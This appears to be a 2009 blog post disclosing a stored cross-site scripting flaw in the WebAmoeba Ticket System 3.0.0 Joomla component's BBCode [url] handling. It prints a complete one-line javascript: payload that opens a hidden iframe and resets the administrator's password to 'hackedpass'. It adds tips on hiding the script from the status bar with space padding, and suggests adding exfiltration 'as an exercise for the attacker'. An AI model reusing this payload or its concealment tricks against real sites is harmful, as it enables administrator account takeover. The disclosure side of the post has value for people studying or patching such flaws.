WebAmoeba Ticket System 3.0.0 BBcode XSS

Posted in Joomla!
2009-07-03 20:31:48 +0000 UTC

I found a nice little exploit for WebAmoeba Ticket System 3.0.0, a Joomla help desk component. The vulnerability is with the BBCode library used to parse BBCode tags, as it does not strip javascript: urls from [url] tags.

To properly exploit this flaw, the attacker must have an account on the victim site and that account must have permissions to post new support tickets. Also, the BBCode parser must be on (this is the default setting). If these conditions are met, it is possible to inject a malicious link into the ticket message.

[url=javascript:/*                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                     */var exploited=false;foo=function(){var iframe=document.createElement('iframe');iframe.src='/index.php?option=com_user&task=edit&tmpl=component';document.body.appendChild(iframe);iframe.addEvent('load',payload);iframe.setStyle('display','none');function payload(e){if(exploited){location.href='';}else{var;if(!doc)return;doc.getElementById('password').value='hackedpass';doc.getElementById('password2').value='hackedpass';doc.getElementsByTagName('form').item(0).submit();exploited=true;}}};foo();][/url]

A few pointers for this exploit: newlines are converted to <br> tags, so the exploit must be all on one line. Brackets get stripped by the BBCode regexp, so array notation won't work. The malicious url will also show in the status bar, though this can be mitigated somewhat by starting the exploit with a block comment containing a real url followed by a large line of spaces, which effectively pushes the script off the readable margin of the status bar, causing the victim to only see, for example, "javascript:/*". This may be just enough to fool the unsuspecting admin.

This particular script appends a new, hidden iframe to the existing page, directs it to the user edit page, and changes the admin's password to 'hackedpass' before directing the existing page to the spoofed destination, There is no notification in this exploit to let the attacker know it has succeeded. To achieve this, the attacker would want to add a bit more script to submit this information elsewhere. I'll leave that as an exercise for the attacker.